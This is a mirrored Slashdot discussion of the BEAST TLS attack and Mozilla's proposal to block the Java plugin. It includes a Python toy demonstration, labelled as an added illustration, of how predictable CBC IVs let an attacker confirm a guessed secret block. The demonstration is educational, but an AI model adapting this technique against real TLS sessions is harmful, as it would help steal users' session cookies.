Slashdot Mirror


To Stop BEAST, Mozilla Developer Proposes Blocking Java Framework

rastos1 writes with this news from The Register: "In a demonstration last Friday, it took less than two minutes for researchers Thai Duong and Juliano Rizzo to wield the exploit to recover an encrypted authentication cookie used to access a PayPal user account. ... The researchers settled on a Java applet as their means to bypass SOP, leading Firefox developers to discuss blocking the framework in a future version of the browser. ... 'I recommend that we blocklist all versions of the Java Plugin,' Firefox developer Brian Smith wrote on Tuesday in a discussion on Mozilla's online bug forum. 'My understanding is that Oracle may or may not be aware of the details of the same-origin exploit. As of now, we have no ETA for a fix for the Java plugin.'"

227 of 309 comments

  1. Java still there by Pieroxy · · Score: 2, Informative

    I have to say I am actually surprised to see how many people still have a Java plugin for their browsers. I had a look at the analytics of my website and it looks like more than 80% of my visitors have one.

    I heavily use Java on the desktop (Eclipse, etc) and on my servers (Tomcat) but I thought Java Applets to be dead for long.

    1. Re:Java still there by CFBMoo1 · · Score: 1

      Not really since games like Minecraft run on the desktop or in the browser using Java.

      --
      ~~ Behold the flying cow with a rail gun! ~~
    2. Re:Java still there by Anonymous Coward · · Score: 5, Informative

      I know no one rtfa but the article gives plenty of examples of webapps that rely on Java. Loads of corporate apps rely on it. I think that this is a bad move without a whitelist being released in tandem, which they are considering.

    3. Re:Java still there by LWATCDR · · Score: 5, Interesting

      Why?
      Java is a much nicer development system than say Flash.
      Frankly Java applets got a bad rap because of Java abuse. I blame Microsoft for that. You see FrontPage had animated buttons as an option and they were freaking java applets.
      No one should have to wait for java just for buttons.
      It is a shame that applets have gotten such a bad rep. It is an even bigger shame that Apple and Google are not supporting Java on IOS, Android, and Chrome.

      --
      See my blog http://ilovecookes.blogspot.com/ for light hearted technical information.
    4. Re:Java still there by nschubach · · Score: 1

      Also, VPN portals..

      --
      Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
    5. Re:Java still there by Pieroxy · · Score: 1, Interesting

      Back in the days, I was impressed by HotJava. This was a full blown web browser developed in Java. No Javascript. It worked well and, as expected, ran Java Applets natively.

      I still don't know why they dropped the development...

    6. Re:Java still there by ToasterMonkey · · Score: 1

      ... and DRAC remote console on any Dell server among many other things.

      You can infer a lot from the "Java is dead" crowd, like they probably don't have a job in IT, or they don't use UNIX, like to say things are dead a lot, etc.

    7. Re:Java still there by jellomizer · · Score: 1

      Legacy Systems tend to have a Java Applet to "Web Base" their applications... Mostly because these apps were webified back in the early 2000's, when HTML was quite limited, as well as the fact that HTML disconnects make it rather impractical, or at least a demanding job, to interface with those old telnet/terminal applications that don't disconnect after each request. Being that Java was supposed to be cross platform, it was a better choice than choosing ActiveX.

      Then there are those Java Applet Games that stuck around for too long, like the ones that Yahoo used to host. And there are those Java Auto Launch apps that require java to be installed for them to run... Once Java is set up, the Applets are set up too...

      Then there are also things like the IBM/Lenovo driver update tools off the website that finds the newest drivers for your PC etc....

      Java isn't dead; it is just not often used for anything big like they hoped (on the desktop).

      --
      If something is so important that you feel the need to post it on the internet... It probably isn't that important.
    8. Re:Java still there by thegarbz · · Score: 1

      Java plugins are distributed via the JRE and could also be delivered by 1 click as a plugin when needed by a website. It's quite conceivable that someone doesn't even know it's installed. I just looked and not only do I have it installed but it's the most up to date version too.

      Plus my Mozilla has something called the Windows Live Photo Gallery, whatever that is. I certainly don't remember installing anything like that.

    9. Re:Java still there by drinkypoo · · Score: 1

      I still have an antique printer (HPLJ2100) and the management console uses Java applets.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    10. Re:Java still there by djdanlib · · Score: 1

      Your average Web user will install ANYTHING if they want to view a website or if some banner ad promises them some "cool" thing. They'll just blindly bomb that OK button like a trained hamster pushing the button to get a pellet. (That's not a bad simile.) Seriously, you could title it "Spy Formatter Pro" and they would install it, because they wouldn't even read the title.

      Then once installed, it's out of sight, out of mind - the idea that "this plugin is going to stick around after I close this website" is way too technical for everyone to understand, never mind "other websites might use it maliciously". The web is like a newspaper for most folks, I guess. When you're reading the newspaper, your attention span isn't going to include the previous few pages, or something from last month, unless you specifically knew you needed to remember it. You're not even going to care that the paper is selling your identity to make a few extra bucks and subsidize your paper. You just want to pay your nickel and read your paper.

      Quite a pain in the rear for those of us who have desktop users and/or family, for whose computers we take some responsibility. We obviously shouldn't take it out on them no matter how much it pains us to see them repeat the same mistakes over and over. They just don't know what they're doing, so we have to make sure there are safeguards in place like BANISHING JAVA from your average computer and maybe requiring approval for plugin installation from someone with the smarts to know better than to install "Free Funny Video Plugin.exe" or whatever!

    11. Re:Java still there by egamma · · Score: 2

      No one should have to wait for java just for buttons.

      People don't like to wait, period. Java is slow, at least on Windows, and I suspect any platform other than Solaris.

    12. Re:Java still there by Short+Circuit · · Score: 1

      I know IE/ActiveX supports trust levels for remote code. (I.e. "I don't want these users running ActiveX code from anything but the trusted servers on our intranet"). Does Java have similar capabilities?

    13. Re:Java still there by Oirad · · Score: 1

      Not to pick nits, but that's your "antique" jetdirect card, not the printer...

    14. Re:Java still there by djdanlib · · Score: 1

      I play too, but I disabled the browser plugin after installing Java. That's the thing - you can't JUST install the JRE, which would be a lot safer. You always get the browser plugin no matter what.

    15. Re:Java still there by mattb112885 · · Score: 1

      My school (and the school I graduated from before this) use Blackboard Vista for posting grades, assignments, and so on. It relies on Java for its function.

    16. Re:Java still there by Anonymous Coward · · Score: 1

      Why?
      Java is a much nicer development system than say Flash.
      Frankly Java applets got a bad rap because of Java abuse. I blame Microsoft for that. You see FrontPage had animated buttons as an option and they were freaking java applets.
      No one should have to wait for java just for buttons.
      It is a shame that applets have gotten such a bad rep. It is an even bigger shame that Apple and Google are not supporting Java on IOS, Android, and Chrome.

      Wrong.

      Android heavily supports java. Java applets in Android's browser are a different story.

      Also, Microsoft is not the one to blame. Instead blame Oracle (or Sun, the former Java maintainer) for all the exploit abuses that are on the loose.

      Get your facts straight.

    17. Re:Java still there by LWATCDR · · Score: 1

      Not any more. Really that is one of those myths that will never die. On a modern system Java will load up pretty dang fast. The browsers could also have an option to preload in the background using a thread if enough people were using Java to make it worthwhile.

      --
      See my blog http://ilovecookes.blogspot.com/ for light hearted technical information.
    18. Re:Java still there by UnknowingFool · · Score: 1

      That's what's wrong with kids these days. Back in my day we didn't have these fancy personal computers to compile code; we had to wait our turn with the one computer with our punch cards. And the punch cards at my school weren't those sissy paper ones. Ours were manly stone cards. If you made a mistake, you had to walk uphill both ways in the snow (even during summer!) to cut another one. If you were lucky, Chuck Norris would lend you his comb to cut the stone. If you weren't, you had to use your swinging cod piece. Kids these days.

      --
      Well, there's spam egg sausage and spam, that's not got much spam in it.
    19. Re:Java still there by sgt+scrub · · Score: 1

      My guess is there wasn't a way to take advantage of NPAPI, i.e. you had to write native Java apps to integrate other types of content.

      --
      Having to work for a living is the root of all evil.
    20. Re:Java still there by gilleain · · Score: 1

      Why? Java is a much nicer development system than say Flash.

      Really? I do a lot of desktop and server java, but not much applet development. It's not great, and I expect that if you want to do animations, music and that, there are better tools for producing flash versions.

    21. Re:Java still there by DrXym · · Score: 2

      A better idea would be for Mozilla to take the approach Google are following and interfere with the exploit, making it unlikely anyone would be attached to a site long enough for it to matter. They should (working in tandem with other browser vendors) give notice that SSL & TLS 1.0 are deprecated, that the protocols will be active for 12 months and then disabled thereafter, and require a user to manually re-enable them. That might put some pressure on sites to actually upgrade.

      In the meantime they can work with Oracle to produce a fix for the Java plugin.

    22. Re:Java still there by gilleain · · Score: 1

      Pls, where can I find this "Free_Funny_Video_Spy_Malware_Trojan.exe" program? I would like to install it across all my machine networks, thx.

    23. Re:Java still there by DrXym · · Score: 1

      Java isn't slow. Like any runtime it has a startup cost. Once that's over with it works perfectly well for even large apps. Eclipse for example. Aside from that I doubt you'd even know what language an app was running in unless you went poking around in its directory, or the app gave itself away (e.g. by using metal theme).

    24. Re:Java still there by Creepy · · Score: 5, Interesting

      Java plugin based internet apps for enterprise are very common, especially in the CAD/CAM/CAE space because they can run on multiple platforms and some of those spaces are heavily entrenched in UNIX (with a trend toward Linux UNIX-like), and many of those depend on Firefox for cross platform support.

    25. Re:Java still there by rb12345 · · Score: 1

      The problem here is that both Firefox and OpenSSL lack support for TLSv1.1 and 1.2. That needs to be addressed before planning to remove SSL3/TLSv1.0 support. In the short-term, the Chrome/OpenSSL fix will hopefully work well enough, and IE9/Opera can disable TLSv1.0 now if you really want.

    26. Re:Java still there by Pieroxy · · Score: 1

      Well... they stopped the project once it was up. Their goal was to demonstrate the Java technology, not to make a web browser as a sustained product.

      Yes, plugins were Java based of course, but I'm sure that could have worked. But let me tell you, by 200, we (linux & non windows users) were in sore need of a web browser. A Java-based one would have done it ;-)

    27. Re:Java still there by muindaur · · Score: 1

      My college uses Blackboard, and the only way to upload files from the computer is via the Java plugin (odd since a school I went to before didn't need it to upload, unless more recent versions of blackboard added it.) Once I'm done with needing it, I do plan on getting rid of it. It's another plugin I don't really care for.

    28. Re:Java still there by idontgno · · Score: 1

      I'm sure it's not a meaningful distinction if the jetdirect card was included in the printer at time of installation. The fact that HP sold nearly-mandatory interface items as optional separate SKUs isn't really an argument for the distinctiveness of the interface card as much as a clear indication of HP's greedy marketing practices.

      --
      Welcome to the Panopticon. Used to be a prison, now it's your home.
    29. Re:Java still there by Tsingi · · Score: 1

      Your average Web user will install ANYTHING if they want to view a website or if some banner ad promises them some "cool" thing

      I've been looking at tick based web games recently. A surprising number of them want to install exe files. I can't run an exe file, but I wouldn't dl and run it even if I could. May as well throw security and privacy right out the window.

      AFAICT none of these games NEED to run an exe on your puter.

      I'm sure I'm the exception, not the rule.

    30. Re:Java still there by jmrives · · Score: 2

      Just so that there is no confusion..., Google does support Java in a big way. Java is the development language for Android. They also provide Google Web Toolkit, which allows one to write browser side code in Java which then gets translated into HTML and Javascript. There are Eclipse plug-ins for both Android and GWT SDKs. I use them daily and I am very pleased with Google's support of Java and these software development kits.

    31. Re:Java still there by Anonymous Coward · · Score: 1

      Oracle (Sun) Java gets a lot of abuse because of the abusive practices of their development and deployment model. They don't actually create patches; only full versions. And, those full versions don't maintain backwards compatibility within a family (for instance 1.6_22 will have a feature that mysteriously disappears in 1.6_26). They break applications with each new "critical security release". The vendors who had the misfortune to choose Oracle / Sun JRE as their development target have to fix their apps every time a security release comes out. An example from earlier this year: out comes a "critical security update". We apply it (it is really a full version of course). Now the logon screen for one of our Java apps has blue text box background with blue text. Yes, there are a lot of apps that continue working fine with new JRE versions. But there are also a damn lot of them that break. We manage 80,000 desktop / notebook machines and EVERY SINGLE JRE release causes at least some apps to break. If we could put out an edict requiring new applications being developed or purchased to not use Oracle JRE we would absolutely do so. Oracle simply does not get the concept of a patch for Java and never has.

    32. Re:Java still there by egamma · · Score: 1

      Not any more. Really that is one of those myths that will never die. On a modern system Java will load up pretty dang fast. The browsers could also have an option to preload in the background using a thread if enough people were using Java to make it worthwhile.

      I have a perfectly modern computer. I use HP Sitescope, which has a web interface. Version 9.5 is HTML based--and it's fast, even on a 5 year old 32 bit system. Click a link and the page loads in a quarter-second. I just installed Version 11.11, on a newer, 64 bit system. Version 11 has a java interface, and it takes 3 seconds to load each page--and it's much slower if I'm working remotely, instead of sitting in the same building. And I'm not counting the start-up time.

      My explanation? Java is slower than HTML.

    33. Re:Java still there by causality · · Score: 1

      I play too, but I disabled the browser plugin after installing Java. That's the thing - you can't JUST install the JRE, which would be a lot safer. You always get the browser plugin no matter what.

      At least on Gentoo, the browser plugin is toggled by the "nsplugin" use flag. You can have a JRE or a JDK without a plugin.

      That indicates you could have the same option on any other distro if you're willing to compile it from source. I'm not sure if that's true for Windows but there's no reason it couldn't be.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    34. Re:Java still there by MightyMartian · · Score: 4, Insightful

      1999 called and wants their anti-Java rant back.

      --
      The world's burning. Moped Jesus spotted on I50. Details at 11.
    35. Re:Java still there by networkBoy · · Score: 1

      My expense reporting tool is a java app.
      My timecard tool is a java app.
      I just had to install java web plugin support at home for my wife's on-line class.
      yeah, this will cause issues if there is not a whitelist capable entry that end-users can manage (but then Mr. Sixpack will likely "trust" everything).
      -nB

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
    36. Re:Java still there by 0123456 · · Score: 2

      Aside from that I doubt you'd even know what language an app was running in unless you went poking around in its directory, or the app gave itself away (e.g. by using metal theme).

      The multi-second garbage collections and multi-gigabyte memory usage for a text editor tend to be a pretty good indication of a Java app.

    37. Re:Java still there by petermgreen · · Score: 2

      How can you even compare Flash and Java?

      For those trying to develop apps in a web browser that don't fit the traditional page by page model there are essentially 4 choices.

      1: AJAX
      2: Java applet
      3: FLASH
      4: Activex control

      So of course those choices will get compared. They all have strengths and weaknesses of course but they can be used for much the same tasks.

      --
      note: i'm known as plugwash most places but i screwd up registering that here somehow in the past and now can't register
    38. Re:Java still there by jonadab · · Score: 1

      The most prominent Java applet of which I am aware is the clock at nist.time.gov, but yeah, in general, Java is at least a hundred times more widely deployed on the web than Silverlight. (Granted, Flash is at least a hundred times more widely deployed on the web than Java.)

      My personal preference would be to eliminate content-handling plugins entirely and switch everything totally over to a helper-apps model, wherein non-web content opens in a separate process in a separate window using the operating system's normal "file associations" model to determine which application to use. Sharing the browser's process, memory space, and window with a third-party program is just asking for trouble. It would be a bad idea from a stability standpoint even if deliberate abuse were impossible, which it isn't. It's also bad for usability, because the user's expectations (that everything in the browser window will behave similarly -- just for example, that if it looks like part of the web page it will print along with the rest of the page when the user hits the print button on the browser's toolbar) are shattered six ways to Sunday. Launching such content in its own window external to the browser and letting the OS decide what app to send it to solves several whole categories of problems in one fell swoop.

      --
      Cut that out, or I will ship you to Norilsk in a box.
    39. Re:Java still there by billDCat · · Score: 1

      "Java is a much nicer development system than say Flash."

      That's a pretty subjective statement. I would take doing development in Flash-based Flex development over Java any day. Flash Builder is a very nice development environment, and I would say that laying out a screen using Flex is a heck of a lot easier than using Spring layouts.

    40. Re:Java still there by m50d · · Score: 1

      If even one site you visit uses it, you'd have it installed. It's not like people can't spare the 20 MB these days.

      --
      I am trolling
    41. Re:Java still there by HeckRuler · · Score: 1

      I dunno man, I'm kind of a fan of freedom and power to the people. Treating the masses like children and putting them in a walled garden under the lock and key of corporate overlords doesn't seem like the best sort of society.

    42. Re:Java still there by Transkaren · · Score: 1

      Yup. Also, Engineers use a Java applet from USGS to determine seismic requirements for structures. If I could not have Java, I could not work.

      --
      -If it's worth doing, it's worth doing well.
    43. Re:Java still there by LWATCDR · · Score: 1

      Netbeans works pretty well.

      --
      See my blog http://ilovecookes.blogspot.com/ for light hearted technical information.
    44. Re:Java still there by LWATCDR · · Score: 1

      I was thinking of more complex applications. I would hate to write a spreadsheet in Flash or an airfoil simulator. I do not want to think about a spreadsheet in HTML 5 at this point. Google is impressive to say the least but GWT is based on Java so maybe not so much :)

      --
      See my blog http://ilovecookes.blogspot.com/ for light hearted technical information.
    45. Re:Java still there by radish · · Score: 4, Insightful

      I work professionally with a mixture of IntelliJ, Eclipse and Visual Studio on a decent spec machine. One of those three performs more slowly and chews up more resources than the other two. I'll give you a hint - it's the one which isn't written in Java.

      Not only is Eclipse slightly more than a "text editor" it also performs significantly better than a less-featured IDE written in a supposedly faster language. The "Java is slow" BS has to stop, it hasn't been true for close to a decade now.

      --
      One button is the power button, the other is the Bender voice button: "Bite My Shiny Metal Ass"

    46. Re:Java still there by DrXym · · Score: 1

      I think you would have to be working with massive datasets to experience garbage collection freezes on the client side. Modern VMs don't even freeze the world while they gc.

    47. Re:Java still there by billDCat · · Score: 2

      Flash/Flex can handle complex applications just fine. Here are some examples of applications done with Flex: http://flex.org/showcase.php

      In there is a timeline-based video editor, a calendaring/email/finance app, a task manager, and a photo editor. I've also seen a PowerPoint type presentation app, a Visio-type tool for creating object relationship charts, plus I've used it myself for creating a medical reporting application for diagnostic sensor data analysis. Flex can hold its own very nicely against Java's capabilities, and I think it's easier to develop for and has a better experience installing and running on the client.

      That said, we are currently trending away from using plugins at all, due to the mobile platform. More and more will be done with HTML/JavaScript/CSS, leaving plugin-based tools as more niche products for Web development. Flex however now compiles mobile applications, so I think we will see more life in that space.

    48. Re:Java still there by lgw · · Score: 1

      Oh, it's been that way since the dawn of Java. "No, really, Java is fast" except for every actual java app I've ever used. All of them are outliers, of course, and one day I'm sure I'll encounter that mythical fast Java app. Keep the faith!

      --
      Socialism: a lie told by totalitarians and believed by fools.
    49. Re:Java still there by Jawnn · · Score: 1

      Back in the days, I was impressed by HotJava. This was a full blown web browser developed in Java. No Javascript. It worked well and, as expected, ran Java Applets natively.

      I still don't know why they dropped the development...

      I remember it too, and as you say, it had much promise. I also remember poor tools and for-shit documentation, which probably kept it from making any significant penetration.

    50. Re:Java still there by egamma · · Score: 1

      1999 called and wants their anti-Java rant back.

      I'm providing evidence that Java is slow, with a specific, real-world example. Apparently, that doesn't fit into your world-view, but you're entitled to your own delusions. Er, I mean, opinions.

    51. Re:Java still there by Luthair · · Score: 1

      Browser plugins are automatically installed with the JRE, and maybe the SDK too, so you may be using it and not be aware of it.

      I've been disabling / removing the browser plugins for years, there just aren't any relevant sites that rely on it anymore and for reference I write Java developer tools for my day job.

    52. Re:Java still there by dshk · · Score: 1

      Flash does not help if you try to do more complex things, and in one of our projects it turned out that the same thing runs significantly slower in Flash than in Java.

    53. Re:Java still there by Stormtrooper42 · · Score: 1

      Are you sure they don't just want Java back?

    54. Re:Java still there by desdinova+216 · · Score: 1

      did you warn them about the 2000 election, and 9/11,

    55. Re:Java still there by gad_zuki! · · Score: 1

      It's a security nightmare. Sun/Oracle haven't been able to secure their VM. End users never upgrade. You'll see people casually running java versions that are months or even years old. The little notifier in the tray is just ignored. Crimepack stats released by Brian Krebs show that it is the number 1 vector for malware.

      Considering how infrequently java is needed by end users, the idea that it's sitting there ready to run any applet is crazy irresponsible. FF and the rest should refuse to let it run if it's not the newest version and/or throw up a warning about java apps and maintain a java whitelist.

      Or we can live in the status quo of massive malware infections.

    56. Re:Java still there by desdinova+216 · · Score: 1

      Obligatory XKCD http://xkcd.com/875/

    57. Re:Java still there by Pieroxy · · Score: 1

      Who said anything was dead?

      Certainly not me.

    58. Re:Java still there by briansmith · · Score: 1

      Implementing that workaround in the browser will not help when the attacker uses Java, because the Java Plugin does not use the browser's TLS implementation; it uses its own.

      An Oracle engineer is the one that came up with that technique for interfering with the exploit.

      We are going to implement it. I am finalizing the patch now.

    59. Re:Java still there by xelah · · Score: 1

      I get freezes with Eclipse and OpenJDK 7. Not just java, but to some extent the whole system becomes much less usable for 5-15s. Java is just fine as long as the JVM stays entirely in memory, but as soon as, say, a 1GB firefox [cough] process causes some rarely used bits of the Java process to be swapped out, you get problems. The gc scans all of its memory, sucking in from disk all sorts of things Eclipse doesn't actually need right now and forcing other applications' pages out to disk. Then the whole process repeats in reverse as your other application sucks everything back in. My system isn't well endowed with memory, but however much memory you have, it's not good to have to waste it on making sure gc can scan something which isn't even being used.

    60. Re:Java still there by shutdown+-p+now · · Score: 1

      FWIW, Visual Studio is ~50% managed code. The last version that was pure native was VS6.

    61. Re:Java still there by Lotana · · Score: 1

      Yes, ideally you would be right. Sadly idealism never survives in the real world.

    62. Re:Java still there by DrXym · · Score: 1

      Well that sounds more like an artifact of your system than just Java by itself. I can typically run 2 eclipse instances and one complex RCP app (the one I'm currently developing) in 3.5GB 32-bit Windows before things start to chug.

    63. Re:Java still there by Rexdude · · Score: 1

      They're not used only for applets. Java Web Start is a mechanism for distributing desktop java applications through the browser. Clicking a special link triggers the plugin, which will download the application to its local cache and launch it, and optionally create a desktop shortcut for future use. Each time the app is launched, it checks the original JNLP link for a newer version and so can be automatically updated.
      For security reasons, unsigned JWS launched applications are restricted from certain operations, such as accessing the local filesystem.

      The wiki link lists several end user apps/games that use JWS.

      --
      "..One hosts to look them up, one DNS to find them, and in the darkness BIND them."
    64. Re:Java still there by xelah · · Score: 1

      It's down to Java's GC effectively hogging physical memory it doesn't really need. 1GB of firefox can cause fewer problems than 400MB of Java because most of that 1GB can be swapped out and left there. You won't see any problems until other applications need enough memory to force parts of Java to disk. I've got 2GB of RAM, and run Eclipse, a Java server, a Java client, apache and a web browser, so there are quite a few times when some of those get substantially swapped out while I'm using the others.

    65. Re:Java still there by JonySuede · · Score: 1

      Java is slow until it reaches a steady state... When the jit engine has determined the best machine code for the java code, it is fast.

      Conclusion:

      // ApplicationType is assumed here as a plain enum so the snippet compiles;
      // the original post imported it from a package (suede.jony) that isn't shown.
      enum ApplicationType { LONG_RUNNING_APPLICATION, SHORT_LIVED_UTILITY }

      public final class JavaSelector {
          // Call equals() on the constant, not the argument, so a null
          // applicationType yields false instead of a NullPointerException.
          public static boolean isJavaAppropriate(ApplicationType applicationType) {
              return ApplicationType.LONG_RUNNING_APPLICATION.equals(applicationType);
          }
      }

      --
      Jehovah be praised, Oracle was not selected
    66. Re:Java still there by drinkypoo · · Score: 1

      My printer won't take any JetDirect cards new enough to not have a Java applet, if such a thing even exists. I have the newest and fanciest card you can install. Therefore your comment is stupid.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    67. Re:Java still there by LWATCDR · · Score: 1

      One GB of firefox?
      Really?
      How many tabs do you have open? And might I suggest Firefox 7 for starters, or Chrome.

      Okay, you are running Eclipse, a Java server, a Java client, apache, and a web browser on a two gig machine. Well, for starters get more memory. Also check the memory settings for apache as well. I am also betting you may be running a Database server as well on that machine.

      --
      See my blog http://ilovecookes.blogspot.com/ for light hearted technical information.
  2. warning? by Anonymous Coward · · Score: 3, Insightful

    How about a simple warning before loading a Java Applet? For example, one of those yellow bars at the top of the page? That would prevent all legitimate applets from being instantly unusable in Firefox, whilst providing some security.

    1. Re:warning? by webheaded · · Score: 1

      This. I wonder if there's some sort of Flashblock-like extension to do this. I would certainly prefer it. Unfortunately we actually have a very very important Java applet at work here that I have no real choice but to use.

      --
      "Those who would sacrifice essential liberties for a little temporary safety deserve neither liberty nor safety." - BenF
    2. Re:warning? by archen · · Score: 1

      As the article says, if you create a whitelisting system, most people will just click "whatever" to make it go away. The Slashdot summary isn't totally accurate, as it's implied that all CURRENT versions of Java should potentially be blacklisted until Oracle releases a fix.

    3. Re:warning? by L4t3r4lu5 · · Score: 1

      We already do. It's called a Whitelist.

      --
      Finally had enough. Come see us over at https://soylentnews.org/
    4. Re:warning? by petermgreen · · Score: 1

      Afaict Java applets fall into two categories.

      There are "untrusted applets", which are sandboxed, preventing access to local resources and limiting access to network resources. These run without any warning prompts from the Java plugin (IIRC some browsers will put up a warning before launching the plugin, but Firefox isn't one of them).

      Then there are "trusted applets"; these pop up a warning with digital signature information when launched, but afaict after that they can do pretty much anything they like to your system! "Trusted applets" are as dangerous as ActiveX controls, but for some reason they don't seem to get anything like the amount of bad PR.

      --
      note: I'm known as plugwash most places but I screwed up registering that here somehow in the past and now can't register
    5. Re:warning? by internerdj · · Score: 1

      Security here is set so stringently that certificate failures pop up on almost every website. I quickly reached the point where it was impractical to browse while verifying all the certificates were valid manually. (Side note: slashdot is giving me one right now.)

    6. Re:warning? by VGPowerlord · · Score: 1

      Yes, strangely it's Java Web Start applications that must request permissions from the users. Signed Java Applets don't seem to have that restriction.

      And yes, in a sense it means that unsigned Java Web Start apps are more secure than Signed Applets are.

      --
      GLaDOS for President 2016! "Well here we are again. It's always such a pleasure." -- GLaDOS, 2011
    7. Re:warning? by webheaded · · Score: 1

      Getting another browser is not a solution but it would be nice to see Firefox implement this behavior instead of just blacklisting the plugin altogether. Certainly a good idea. I wonder why you don't see this more often.

      --
      "Those who would sacrifice essential liberties for a little temporary safety deserve neither liberty nor safety." - BenF
    8. Re:warning? by mzs · · Score: 1

      It's a MITM attack. You will expect Java on some site sooner or later, one that you would allow, and they send an extra jar that steals the cookies at that point.

    9. Re:warning? by Caetel · · Score: 1

      Chrome does this for a number of plugins, including Java.

  3. Totally overblown. by Anonymous Coward · · Score: 1

    The viability of the BEAST attack is totally overblown. The attacker must be a man-in-the-middle and control a website that you visit in order to have any chance of getting a cookie/password/thing-of-value that it must already be able to guess. The actual attack is merely defeating the CBC in order to encrypt the guessed value in precisely the same way as the target value, allowing you to compare to see if the encrypted data are equal.
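The mechanism this comment describes (a guessed value encrypted "in precisely the same way" as the target so the two ciphertexts can be compared) comes down to CBC with a predictable IV, which is what TLS 1.0 has: each record's IV is the last ciphertext block of the previous record. The following is an added illustration, not code from this post or from the BEAST researchers: a toy record layer with chained IVs beside one with per-record random IVs (the TLS 1.1 fix), showing that a single chosen-plaintext probe confirms a correct guess of one block in the first case and not in the second. The keyed PRF standing in for the block cipher, the 16-byte cookie value, and the class and function names are all constructed for the example.

```python
import hashlib
import hmac
import os

BLOCK = 16  # block size in bytes, as for AES


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for one block-cipher encryption E_key(block).

    A keyed PRF (HMAC-SHA256 truncated to one block) replaces AES so the example
    needs only the standard library. The argument below only uses the fact that
    equal inputs give equal outputs and unequal inputs (almost surely) differ,
    which holds for a real block cipher too; decryption is never needed here.
    """
    assert len(block) == BLOCK
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Textbook CBC: C_i = E(P_i XOR C_(i-1)) with C_0 = iv; no padding (aligned input only)."""
    assert len(plaintext) % BLOCK == 0
    blocks, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(plaintext[i:i + BLOCK], prev))
        blocks.append(prev)
    return b"".join(blocks)


class ChainedIvRecords:
    """TLS 1.0 style CBC: each record's IV is the last ciphertext block of the
    previous record, so anyone watching the wire knows the next IV in advance."""

    def __init__(self, key: bytes) -> None:
        self.key = key
        self.prev = os.urandom(BLOCK)  # IV of the very first record

    def next_iv(self) -> bytes:
        return self.prev

    def send(self, plaintext: bytes) -> bytes:
        ct = cbc_encrypt(self.key, self.prev, plaintext)
        self.prev = ct[-BLOCK:]
        return ct


class ExplicitIvRecords:
    """TLS 1.1+ style CBC: every record carries its own fresh random IV."""

    def __init__(self, key: bytes) -> None:
        self.key = key

    def send(self, plaintext: bytes) -> bytes:
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, plaintext)


def guess_check_block(guess: bytes, c_prev: bytes, predicted_iv: bytes) -> bytes:
    """Plaintext block that tests `guess` against a block encrypted as C_t = E(P_t XOR c_prev),
    assuming the next record's IV will be predicted_iv. Sending P' = guess XOR c_prev XOR predicted_iv
    yields E(P' XOR predicted_iv) = E(guess XOR c_prev), which equals C_t iff guess == P_t."""
    return xor(xor(guess, c_prev), predicted_iv)


def run_demo() -> dict:
    """Encrypt one constructed record holding a secret block under both record layers
    and report whether a single chosen-plaintext probe confirms a guess of that block."""
    key = os.urandom(BLOCK)
    secret = b"a1b2c3d4e5f6g7h8"              # constructed 16-byte secret block
    record = b"Cookie: session=" + secret     # block 1 is public, block 2 is the secret
    wrong = b"a1b2c3d4e5f6g7h9"               # off by one byte
    results = {}

    # TLS 1.0 style: the next IV is visible on the wire before the probe is sent.
    chained = ChainedIvRecords(key)
    ct = chained.send(record)
    c_prev, c_target = ct[0:BLOCK], ct[BLOCK:2 * BLOCK]
    for name, g in (("chained_correct_guess", secret), ("chained_wrong_guess", wrong)):
        probe = guess_check_block(g, c_prev, chained.next_iv())
        results[name] = chained.send(probe)[:BLOCK] == c_target

    # TLS 1.1 style: the IV is drawn after the probe is handed over, so the best prediction
    # (the last block seen) is wrong and even the correct guess is not confirmed.
    explicit = ExplicitIvRecords(key)
    ct = explicit.send(record)
    c_prev, c_target = ct[BLOCK:2 * BLOCK], ct[2 * BLOCK:3 * BLOCK]
    probe = guess_check_block(secret, c_prev, ct[-BLOCK:])
    results["explicit_iv_correct_guess"] = explicit.send(probe)[BLOCK:2 * BLOCK] == c_target
    return results


if __name__ == "__main__":
    for name, confirmed in run_demo().items():
        print(f"{name}: {'confirmed' if confirmed else 'not confirmed'}")
```

The probe only works because the attacker can both see the previous ciphertext block and choose the plaintext of the next record on the same connection, which is the combination the comment lists as a precondition (a man-in-the-middle plus a way to make the victim's client send chosen data). With an unpredictable per-record IV the first of those no longer helps, which is why the protocol-level fix is TLS 1.1 rather than anything in the application.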

    1. Re:Totally overblown. by Hatta · · Score: 2

      The attacker must be a man-in-the-middle and control a website that you visit in order to have any chance of getting a cookie/password/thing-of-value that it must already be able to guess.

      Why is that so implausible? With high profile sites like kernel.org, linux.com, mysql.com being compromised on what seems like a biweekly basis these days, I wouldn't put that out of the realm of plausibility.

      --
      Give me Classic Slashdot or give me death!
    2. Re:Totally overblown. by sgt+scrub · · Score: 1

      Something that can decrypt a cookie can just look at your cookies directly from your machine. If you install an evil Java plugin it could decrypt and expose the content of your encrypted cookies without you knowing about it.

      --
      Having to work for a living is the root of all evil.
    3. Re:Totally overblown. by VGPowerlord · · Score: 1

      Something that can decrypt a cookie can just look at your cookies directly from your machine. If you install an evil Java plugin it could decrypt and expose the content of your encrypted cookies without you knowing about it.

      So, if you're already compromised, your information can be compromised?!?!?!?!?!?!?!?!?!

      (Apologies to Raymond Chen.)

      --
      GLaDOS for President 2016! "Well here we are again. It's always such a pleasure." -- GLaDOS, 2011
    4. Re:Totally overblown. by briansmith · · Score: 1

      The applet doesn't have to guess anything with the Java-based attack.

    5. Re:Totally overblown. by briansmith · · Score: 1

      An applet cannot steal the cookies directly but it could cause the JVM to send the cookies in HTTPS requests on its behalf.

    6. Re:Totally overblown. by hesaigo999ca · · Score: 1

      Great comment. What people fail to realize is that with all these extremely well formed haxors out there, these types of vulnerabilities give them an easier time to do what they need to do... if we take that away from them, they have to find other options... the less the better.

